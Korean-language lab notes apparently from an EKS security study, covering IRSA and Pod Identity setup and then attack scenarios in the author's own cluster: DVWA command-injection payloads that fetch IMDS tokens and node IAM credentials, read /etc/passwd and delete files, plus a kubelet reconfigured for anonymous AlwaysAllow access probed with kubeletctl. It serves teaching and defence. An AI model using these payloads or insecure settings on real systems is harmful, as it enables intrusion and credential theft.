value: arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z
- name: AWS_WEB_IDENTITY_TOKEN_FILE
value: /var/run/secrets/eks.amazonaws.com/serviceaccount/token
image: amazon/aws-cli:latest
name: my-aws-cli
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-klxsd
readOnly: true
- mountPath: /var/run/secrets/eks.amazonaws.com/serviceaccount
name: aws-iam-token
readOnly: true
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Never
serviceAccountName: my-sa
terminationGracePeriodSeconds: 0
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: aws-iam-token
projected:
sources:
- serviceAccountToken:
audience: sts.amazonaws.com
expirationSeconds: 86400
path: token
- name: kube-api-access-klxsd
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test3 -- ls /var/run/secrets/eks.amazonaws.com/serviceaccount
token
$ kubectl describe pod eks-iam-test3
...
Environment:
AWS_STS_REGIONAL_ENDPOINTS: regional
AWS_DEFAULT_REGION: ap-northeast-2
AWS_REGION: ap-northeast-2
AWS_ROLE_ARN: arn:aws:iam::911283464785:role/eksctl-myeks-addon-iamserviceaccount-default-Role1-GE2DZKJYWCEN
AWS_WEB_IDENTITY_TOKEN_FILE: /var/run/secrets/eks.amazonaws.com/serviceaccount/token
Mounts:
/var/run/secrets/eks.amazonaws.com/serviceaccount from aws-iam-token (ro)
/var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-69rh8 (ro)
...
Volumes:
aws-iam-token:
Type: Projected (a volume that contains injected data from multiple sources)
TokenExpirationSeconds: 86400
kube-api-access-sn467:
Type: Projected (a volume that contains injected data from multiple sources)
TokenExpirationSeconds: 3607
ConfigMapName: kube-root-ca.crt
ConfigMapOptional: <nil>
DownwardAPI: true
...
# 파드에서 aws cli 사용 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamserviceaccount --cluster $CLUSTER_NAME
NAMESPACE NAME ROLE ARN
default my-sa arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z
kube-system aws-load-balancer-controller arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-kube-sy-Role1-eRtMjg6MGlN1
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test3 -- aws sts get-caller-identity --query Arn
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z/botocore-session-1712938663"
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test3 -- aws s3 ls
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test3 -- aws ec2 describe-instances --region ap-northeast-2
An error occurred (UnauthorizedOperation) when calling the DescribeInstances operation: You are not authorized to perform this operation. User: arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z/botocore-session-1712938663 is not authorized to perform: ec2:DescribeInstances because no identity-based policy allows the ec2:DescribeInstances action
command terminated with exit code 254
# 당연히 안됨 - s3 readonlyaccess 이기 때문
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test3 -- aws ec2 describe-vpcs --region ap-northeast-2
An error occurred (UnauthorizedOperation) when calling the DescribeVpcs operation: You are not authorized to perform this operation. User: arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z/botocore-session-1712938663 is not authorized to perform: ec2:DescribeVpcs because no identity-based policy allows the ec2:DescribeVpcs action
command terminated with exit code 254
IAM_TOKEN=$(kubectl exec -it eks-iam-test3 -- cat /var/run/secrets/eks.amazonaws.com/serviceaccount/token)
echo $IAM_TOKEN
(https://medium.com/@7424069/aws-how-to-use-eks-irsa-in-the-most-vulnerable-way-5d8f4c8d6d20)
⚠️ Pod Identity를 씁시다.⚠️
# 리소스 삭제
kubectl delete pod eks-iam-test3
eksctl delete iamserviceaccount --cluster $CLUSTER_NAME --name my-sa --namespace default
eksctl get iamserviceaccount --cluster $CLUSTER_NAME
kubectl get sa
신기능 : Pod Identity
IRSA 와는 동작 자체가 다릅니다!
애드온으로 설치 가능
# 설치
ADDON=eks-pod-identity-agent
aws eks describe-addon-versions \
--addon-name $ADDON \
--kubernetes-version 1.28 \
--query "addons[].addonVersions[].[addonVersion, compatibilities[].defaultVersion]" \
--output text
v1.2.0-eksbuild.1
True
v1.1.0-eksbuild.1
False
v1.0.0-eksbuild.1
False
# 모니터링
watch -d kubectl get pod -A
# 설치
aws eks create-addon --cluster-name $CLUSTER_NAME --addon-name eks-pod-identity-agent
or
eksctl create addon --cluster $CLUSTER_NAME --name eks-pod-identity-agent --version 1.2
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get addon --cluster $CLUSTER_NAME
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n kube-system get daemonset eks-pod-identity-agent
NAME DESIRED CURRENT READY UP-TO-DATE AVAILABLE NODE SELECTOR AGE
eks-pod-identity-agent 3 3 3 3 3 <none> 78s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n kube-system get pods -l app.kubernetes.io/name=eks-pod-identity-agent
NAME READY STATUS RESTARTS AGE
eks-pod-identity-agent-cg64b 1/1 Running 0 81s
eks-pod-identity-agent-s4ljt 1/1 Running 0 81s
eks-pod-identity-agent-z9vzj 1/1 Running 0 81s
kubectl get ds -n kube-system eks-pod-identity-agent -o yaml | kubectl neat | yh
...
containers:
- args:
- --port
- "80"
- --cluster-name
- myeks
- --probe-port
- "2703"
command:
- /go-runner
- /eks-pod-identity-agent
- server
....
ports:
- containerPort: 80
name: proxy
protocol: TCP
- containerPort: 2703
name: probes-port
protocol: TCP
...
securityContext:
capabilities:
add:
- CAP_NET_BIND_SERVICE
...
hostNetwork: true
...
# Host Network 를 씁니다. worker node 의 IP 대역을 씀
# 네드워크 정보 확인
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ss -tnlp | grep eks-pod-identit; echo "-----";done
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ss -tnlp | grep eks-pod-identit; echo "-----";done
LISTEN 0 4096 127.0.0.1:2703 0.0.0.0:* users:(("eks-pod-identit",pid=96657,fd=7))
LISTEN 0 4096 169.254.170.23:80 0.0.0.0:* users:(("eks-pod-identit",pid=96657,fd=6))
LISTEN 0 4096 [fd00:ec2::23]:80 [::]:* users:(("eks-pod-identit",pid=96657,fd=8))
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c route; done
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c -br -4 addr; done
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c addr; done
...
24: pod-id-link0: <BROADCAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default qlen 1000
link/ether ca:05:90:46:3d:df brd ff:ff:ff:ff:ff:ff
inet 169.254.170.23/32 scope global pod-id-link0
valid_lft forever preferred_lft forever
inet6 fd00:ec2::23/128 scope global
valid_lft forever preferred_lft forever
inet6 fe80::c805:90ff:fe46:3ddf/64 scope link
valid_lft forever preferred_lft forever
...
# 서비스 어카운트와 IAM Policy 와 연결
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl create podidentityassociation \
> --cluster $CLUSTER_NAME \
> --namespace default \
> --service-account-name s3-sa \
> --role-name s3-eks-pod-identity-role \
> --permission-policy-arns arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess \
> --region $AWS_REGION
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa
NAME SECRETS AGE
default 0 11h
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get podidentityassociation --cluster $CLUSTER_NAME
ASSOCIATION ARN NAMESPACE SERVICE ACCOUNT NAME IAM ROLE ARN
arn:aws:eks:ap-northeast-2:236747833953:podidentityassociation/myeks2/a-orpwrxhhve1stbpaf default s3-sa arn:aws:iam::236747833953:role/s3-eks-pod-identity-role
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-pod-identity-associations --cluster-name $CLUSTER_NAME | jq
{
"associations": [
{
"clusterName": "myeks2",
"namespace": "default",
"serviceAccount": "s3-sa",
"associationArn": "arn:aws:eks:ap-northeast-2:236747833953:podidentityassociation/myeks2/a-orpwrxhhve1stbpaf",
"associationId": "a-orpwrxhhve1stbpaf"
}
]
}
# ABAC 지원을 위해 sts:Tagsession 추가
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws iam get-role --query 'Role.AssumeRolePolicyDocument' --role-name s3-eks-pod-identity-role | jq .
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "pods.eks.amazonaws.com"
},
"Action": [
"sts:AssumeRole",
"sts:TagSession"
]
}
]
}
# 서비스어카운트, 파드 생성
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create sa s3-sa
serviceaccount/s3-sa created
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-pod-identity
spec:
serviceAccountName: s3-sa
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0
EOF
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod eks-pod-identity -o yaml | kubectl neat| yh
apiVersion: v1
kind: Pod
metadata:
name: eks-pod-identity
namespace: default
spec:
containers:
- command:
- sleep
- "36000"
env:
- name: AWS_STS_REGIONAL_ENDPOINTS
value: regional
- name: AWS_DEFAULT_REGION
value: ap-northeast-2
- name: AWS_REGION
value: ap-northeast-2
- name: AWS_CONTAINER_CREDENTIALS_FULL_URI
value: http://169.254.170.23/v1/credentials
- name: AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE
value: /var/run/secrets/pods.eks.amazonaws.com/serviceaccount/eks-pod-identity-token
image: amazon/aws-cli:latest
name: my-aws-cli
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-c9pp4
readOnly: true
- mountPath: /var/run/secrets/pods.eks.amazonaws.com/serviceaccount
name: eks-pod-identity-token
readOnly: true
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Never
serviceAccountName: s3-sa
terminationGracePeriodSeconds: 0
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: eks-pod-identity-token
projected:
sources:
- serviceAccountToken:
audience: pods.eks.amazonaws.com
expirationSeconds: 86400
path: eks-pod-identity-token
- name: kube-api-access-c9pp4
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-pod-identity -- aws sts get-caller-identity --query Arn
"arn:aws:sts::236747833953:assumed-role/s3-eks-pod-identity-role/eks-myeks2-eks-pod-id-b26827b2-92b1-488a-81d6-2345428fea44"
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-pod-identity -- env | grep AWS
AWS_STS_REGIONAL_ENDPOINTS=regional
AWS_DEFAULT_REGION=ap-northeast-2
AWS_REGION=ap-northeast-2
AWS_CONTAINER_CREDENTIALS_FULL_URI=http://169.254.170.23/v1/credentials
AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE=/var/run/secrets/pods.eks.amazonaws.com/serviceaccount/eks-pod-identity-token
# 토큰 정보 확인
kubectl exec -it eks-pod-identity -- ls /var/run/secrets/pods.eks.amazonaws.com/serviceaccount/
kubectl exec -it eks-pod-identity -- cat /var/run/secrets/pods.eks.amazonaws.com/serviceaccount/eks-pod-identity-token
eksctl delete podidentityassociation --cluster $CLUSTER_NAME --namespace default --service-account-name s3-sa
kubectl delete pod eks-pod-identity
kubectl delete sa s3-sa
OWASP Kubernetes Top Ten : K8S 보안 위협
악분님의 시나리오로 실습
EKS pod가 IMDS API를 악용하는 시나리오
mysql deploy
cat <<EOT > mysql.yaml
apiVersion: v1
kind: Secret
metadata:
name: dvwa-secrets
type: Opaque
data:
# s3r00tpa55
ROOT_PASSWORD: czNyMDB0cGE1NQ==
# dvwa
DVWA_USERNAME: ZHZ3YQ==
# p@ssword
DVWA_PASSWORD: cEBzc3dvcmQ=
# dvwa
DVWA_DATABASE: ZHZ3YQ==
---
apiVersion: v1
kind: Service
metadata:
name: dvwa-mysql-service
spec:
selector:
app: dvwa-mysql
tier: backend
ports:
- protocol: TCP
port: 3306
targetPort: 3306
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: dvwa-mysql
spec:
replicas: 1
selector:
matchLabels:
app: dvwa-mysql
tier: backend
template:
metadata:
labels:
app: dvwa-mysql
tier: backend
spec:
containers:
- name: mysql
image: mariadb:10.1
resources:
requests:
cpu: "0.3"
memory: 256Mi
limits:
cpu: "0.3"
memory: 256Mi
ports:
- containerPort: 3306
env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: ROOT_PASSWORD
- name: MYSQL_USER
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_USERNAME
- name: MYSQL_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_PASSWORD
- name: MYSQL_DATABASE
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_DATABASE
EOT
kubectl apply -f mysql.yaml
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k get pods
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 8h
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 8h
dvwa-mysql-5d87894bb6-zxkmq 1/1 Running 0 12s
cat <<EOT > dvwa.yaml
apiVersion: v1
kind: ConfigMap
metadata:
name: dvwa-config
data:
RECAPTCHA_PRIV_KEY: ""
RECAPTCHA_PUB_KEY: ""
SECURITY_LEVEL: "low"
PHPIDS_ENABLED: "0"
PHPIDS_VERBOSE: "1"
PHP_DISPLAY_ERRORS: "1"
---
apiVersion: v1
kind: Service
metadata:
name: dvwa-web-service
spec:
selector:
app: dvwa-web
type: ClusterIP
ports:
- protocol: TCP
port: 80
targetPort: 80
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: dvwa-web
spec:
replicas: 1
selector:
matchLabels:
app: dvwa-web
template:
metadata:
labels:
app: dvwa-web
spec:
containers:
- name: dvwa
image: cytopia/dvwa:php-8.1
ports:
- containerPort: 80
resources:
requests:
cpu: "0.3"
memory: 256Mi
limits:
cpu: "0.3"
memory: 256Mi
env:
- name: RECAPTCHA_PRIV_KEY
valueFrom:
configMapKeyRef:
name: dvwa-config
key: RECAPTCHA_PRIV_KEY
- name: RECAPTCHA_PUB_KEY
valueFrom:
configMapKeyRef:
name: dvwa-config
key: RECAPTCHA_PUB_KEY
- name: SECURITY_LEVEL
valueFrom:
configMapKeyRef:
name: dvwa-config
key: SECURITY_LEVEL
- name: PHPIDS_ENABLED
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHPIDS_ENABLED
- name: PHPIDS_VERBOSE
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHPIDS_VERBOSE
- name: PHP_DISPLAY_ERRORS
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHP_DISPLAY_ERRORS
- name: MYSQL_HOSTNAME
value: dvwa-mysql-service
- name: MYSQL_DATABASE
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_DATABASE
- name: MYSQL_USERNAME
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_USERNAME
- name: MYSQL_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_PASSWORD
EOT
kubectl apply -f dvwa.yaml
cat <<EOT > dvwa-ingress.yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
annotations:
alb.ingress.kubernetes.io/certificate-arn: $CERT_ARN
alb.ingress.kubernetes.io/group.name: study
alb.ingress.kubernetes.io/listen-ports: '[{"HTTPS":443}, {"HTTP":80}]'
alb.ingress.kubernetes.io/load-balancer-name: myeks-ingress-alb
alb.ingress.kubernetes.io/scheme: internet-facing
alb.ingress.kubernetes.io/ssl-redirect: "443"
alb.ingress.kubernetes.io/success-codes: 200-399
alb.ingress.kubernetes.io/target-type: ip
name: ingress-dvwa
spec:
ingressClassName: alb
rules:
- host: dvwa.$MyDomain
http:
paths:
- backend:
service:
name: dvwa-web-service
port:
number: 80
path: /
pathType: Prefix
EOT
kubectl apply -f dvwa-ingress.yaml
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo -e "DVWA Web https://dvwa.$MyDomain"
DVWA Web https://dvwa.22joo.shop
# 명령 실행 가능 확인
8.8.8.8 ; echo ; hostname
8.8.8.8 ; echo ; whoami
8.8.8.8 ; curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
AQAEALuFUlNOrA4dg1kZCzRVjhy2BPmP0vQhb6VDdVqH-jqYsjDX2w==
8.8.8.8 ; curl -s -H "X-aws-ec2-metadata-token: AQAEALuFUlNOrA4dg1kZCzRVjhy2BPmP0vQhb6VDdVqH-jqYsjDX2w==" –v http://169.254.169.254/latest/meta-data/iam/security-credentials/
eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
8.8.8.8 ; curl -s -H "X-aws-ec2-metadata-token: AQAEALuFUlNOrA4dg1kZCzRVjhy2BPmP0vQhb6VDdVqH-jqYsjDX2w==" –v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
8.8.8.8; cat /etc/passwd
8.8.8.8; rm -rf /tmp/*
악분님의 시나리오로 실습 : Kubelet 미흡한 인증/인가 설정 시 위험 + kubeletct 툴
# 노드의 kubelet API 인증과 인가 관련 정보 확인
ssh ec2-user@$N1 cat /etc/kubernetes/kubelet/kubelet-config.json | jq
ssh ec2-user@$N1 cat /var/lib/kubelet/kubeconfig | yh
# 노드의 kubelet 사용 포트 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# ssh ec2-user@$N1 sudo ss -tnlp | grep kubelet
LISTEN 0 4096 127.0.0.1:10248 0.0.0.0:* users:(("kubelet",pid=3019,fd=16))
LISTEN 0 4096 *:10250 *:* users:(("kubelet",pid=3019,fd=17))
# 데모를 위해 awscli 파드 생성
LISTEN 0 4096 *:10250 *:* users:(("kubelet",pid=3019,fd=17))
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# cat <<EOF | kubectl apply -f -
> apiVersion: v1
> kind: Pod
> metadata:
> name: myawscli
> spec:
> #serviceAccountName: my-sa
> containers:
> - name: my-aws-cli
> image: amazon/aws-cli:latest
> command: ['sleep', '36000']
> restartPolicy: Never
> terminationGracePeriodSeconds: 0
> EOF
pod/myawscli created
# 파드 사용
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it myawscli -- aws sts get-caller-identity --query Arn
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-0ba38cf4130566468"
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it myawscli -- aws s3 ls
An error occurred (AccessDenied) when calling the ListBuckets operation: Access Denied
command terminated with exit code 254
# 조회 가능
kubectl exec -it myawscli -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager
kubectl exec -it myawscli -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager
# 기존 kubeconfig 삭제
## Bastion Host 2 에서 진행
rm -rf ~/.kube
# 다운로드
curl -LO https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64 && chmod a+x ./kubeletctl_linux_amd64 && mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl
kubeletctl version
kubeletctl help
# 노드1 IP 변수 지정
N1=<각자 자신의 노드1의 PrivateIP>
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k get pods -owide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 9h 192.168.1.162 ip-192-168-1-231.ap-northeast-2.compute.internal <none> <none>
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 9h 192.168.3.16 ip-192-168-3-12.ap-northeast-2.compute.internal <none> <none>
dvwa-mysql-5d87894bb6-zxkmq 1/1 Running 0 33m 192.168.3.221 ip-192-168-3-12.ap-northeast-2.compute.internal <none> <none>
dvwa-web-6654c98f76-zpdl9 1/1 Running 0 31m 192.168.2.208 ip-192-168-2-179.ap-northeast-2.compute.internal <none> <none>
myawscli 1/1 Running 0 4m47s 192.168.1.108 ip-192-168-1-231.ap-northeast-2.compute.internal <none> <none>
# pod 가 node1 에 존재하기 때문에 N1=192.168.1.231
# 노드1 IP로 Scan
(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl scan --cidr $N1/32
# 노드1에 kubelet API 호출 시도
(N/A:N/A) [root@myeks2-bastion-2 ~]# curl -k https://$N1:10250/pods; echo
Unauthorized
# 노드1 접속
ssh ec2-user@$N1
# 미흡한 인증/인가 설정으로 변경
sudo vi /etc/kubernetes/kubelet/kubelet-config.json
...
"authentication": {
"anonymous": {
"enabled": true
...
},
"authorization": {
"mode": "AlwaysAllow",
...
# kubelet restart
sudo systemctl restart kubelet
systemctl status kubelet
# 파드 목록 확인
curl -s -k https://$N1:10250/pods | jq
# kubelet-config.json 설정 내용 확인
(N/A:N/A) [root@myeks2-bastion-2 ~]# curl -k https://$N1:10250/configz | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3060 100 3060 0 0 517k 0 --:--:-- --:--:-- --:--:-- 597k
{
"kubeletconfig": {
"enableServer": true,
"syncFrequency": "1m0s",
"fileCheckFrequency": "20s",
"httpCheckFrequency": "20s",
"address": "0.0.0.0",
"port": 10250,
"tlsCipherSuites": [
"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305",
"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305",
"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
"TLS_RSA_WITH_AES_256_GCM_SHA384",
"TLS_RSA_WITH_AES_128_GCM_SHA256"
],
...
"enableSystemLogHandler": true,
"enableSystemLogQuery": false,
"shutdownGracePeriod": "0s",
"shutdownGracePeriodCriticalPods": "0s",
"enableProfilingHandler": true,
"enableDebugFlagsHandler": true,
"seccompDefault": false,
"memoryThrottlingFactor": 0.9,
"registerNode": true,
"localStorageCapacityIsolation": true,
"containerRuntimeEndpoint": "unix:///run/containerd/containerd.sock"
}
}
# kubeletct 사용
# Return kubelet's configuration
(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl -s $N1 configz | jq
{
"kubeletconfig": {
"enableServer": true,
"syncFrequency": "1m0s",
"fileCheckFrequency": "20s",
"httpCheckFrequency": "20s",
"address": "0.0.0.0",
"port": 10250,
"tlsCipherSuites": [
"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305",
"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305",
"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
"TLS_RSA_WITH_AES_256_GCM_SHA384",
"TLS_RSA_WITH_AES_128_GCM_SHA256"
],
"serverTLSBootstrap": true,
"authentication": {
"x509": {
"clientCAFile": "/etc/kubernetes/pki/ca.crt"
},
"webhook": {
"enabled": true,
"cacheTTL": "2m0s"
},
"anonymous": {
"enabled": true
}
},
"authorization": {
"mode": "AlwaysAllow",
"webhook": {
"cacheAuthorizedTTL": "5m0s",
"cacheUnauthorizedTTL": "30s"
}
},
"registryPullQPS": 5,
"registryBurst": 10,
"eventRecordQPS": 50,
"eventBurst": 100,
"enableDebuggingHandlers": true,
"healthzPort": 10248,
"healthzBindAddress": "127.0.0.1",
"oomScoreAdj": -999,
"clusterDomain": "cluster.local",
"clusterDNS": [
"10.100.0.10"
],
"streamingConnectionIdleTimeout": "4h0m0s",
"nodeStatusUpdateFrequency": "10s",
"nodeStatusReportFrequency": "5m0s",
"nodeLeaseDurationSeconds": 40,
"imageMinimumGCAge": "2m0s",
"imageGCHighThresholdPercent": 85,
"imageGCLowThresholdPercent": 80,
"volumeStatsAggPeriod": "1m0s",
"cgroupRoot": "/",
"cgroupsPerQOS": true,
"cgroupDriver": "systemd",
"cpuManagerPolicy": "none",
"cpuManagerReconcilePeriod": "10s",
"memoryManagerPolicy": "None",
"topologyManagerPolicy": "none",
"topologyManagerScope": "container",
"runtimeRequestTimeout": "2m0s",
"hairpinMode": "hairpin-veth",
"maxPods": 50,
"podPidsLimit": -1,
"resolvConf": "/etc/resolv.conf",
"cpuCFSQuota": true,
"cpuCFSQuotaPeriod": "100ms",
"nodeStatusMaxImages": 50,
"maxOpenFiles": 1000000,
"contentType": "application/vnd.kubernetes.protobuf",
"kubeAPIQPS": 50,
"kubeAPIBurst": 100,
"serializeImagePulls": false,
"evictionHard": {
"memory.available": "100Mi",
"nodefs.available": "10%",
"nodefs.inodesFree": "5%"
},
"evictionPressureTransitionPeriod": "5m0s",
"enableControllerAttachDetach": true,
"protectKernelDefaults": true,
"makeIPTablesUtilChains": true,
"iptablesMasqueradeBit": 14,
"iptablesDropBit": 15,
"featureGates": {
"RotateKubeletServerCertificate": true
},
"failSwapOn": true,
"memorySwap": {},
"containerLogMaxSize": "10Mi",
"containerLogMaxFiles": 5,
"configMapAndSecretChangeDetectionStrategy": "Watch",
"kubeReserved": {
"cpu": "70m",
"ephemeral-storage": "1Gi",
"memory": "442Mi"
},
"systemReservedCgroup": "/system",
"kubeReservedCgroup": "/runtime",
"enforceNodeAllocatable": [
"pods"
],
"volumePluginDir": "/usr/libexec/kubernetes/kubelet-plugins/volume/exec/",
"providerID": "aws:///ap-northeast-2a/i-0ba38cf4130566468",
"logging": {
"format": "text",
"flushFrequency": "5s",
"verbosity": 2,
"options": {
"json": {
"infoBufferSize": "0"
}
}
},
"enableSystemLogHandler": true,
"enableSystemLogQuery": false,
"shutdownGracePeriod": "0s",
"shutdownGracePeriodCriticalPods": "0s",
"enableProfilingHandler": true,
"enableDebugFlagsHandler": true,
"seccompDefault": false,
"memoryThrottlingFactor": 0.9,
"registerNode": true,
"localStorageCapacityIsolation": true,
"containerRuntimeEndpoint": "unix:///run/containerd/containerd.sock"
}
}
(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl -s $N1 configz | jq
{
"kubeletconfig": {
"enableServer": true,
"syncFrequency": "1m0s",
"fileCheckFrequency": "20s",
"httpCheckFrequency": "20s",
"address": "0.0.0.0",
"port": 10250,
"tlsCipherSuites": [
"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305",
"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305",
"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
"TLS_RSA_WITH_AES_256_GCM_SHA384",
"TLS_RSA_WITH_AES_128_GCM_SHA256"
],
"serverTLSBootstrap": true,
"authentication": {
"x509": {
"clientCAFile": "/etc/kubernetes/pki/ca.crt"
},
"webhook": {
"enabled": true,
"cacheTTL": "2m0s"
},
"anonymous": {
"enabled": true
}
},
"authorization": {
"mode": "AlwaysAllow",
"webhook": {
"cacheAuthorizedTTL": "5m0s",
"cacheUnauthorizedTTL": "30s"
}
},
"registryPullQPS": 5,
"registryBurst": 10,
"eventRecordQPS": 50,
"eventBurst": 100,
"enableDebuggingHandlers": true,
"healthzPort": 10248,
"healthzBindAddress": "127.0.0.1",
"oomScoreAdj": -999,
"clusterDomain": "cluster.local",
"clusterDNS": [
"10.100.0.10"
],
"streamingConnectionIdleTimeout": "4h0m0s",
"nodeStatusUpdateFrequency": "10s",
"nodeStatusReportFrequency": "5m0s",
"nodeLeaseDurationSeconds": 40,
"imageMinimumGCAge": "2m0s",
"imageGCHighThresholdPercent": 85,
"imageGCLowThresholdPercent": 80,
"volumeStatsAggPeriod": "1m0s",
"cgroupRoot": "/",
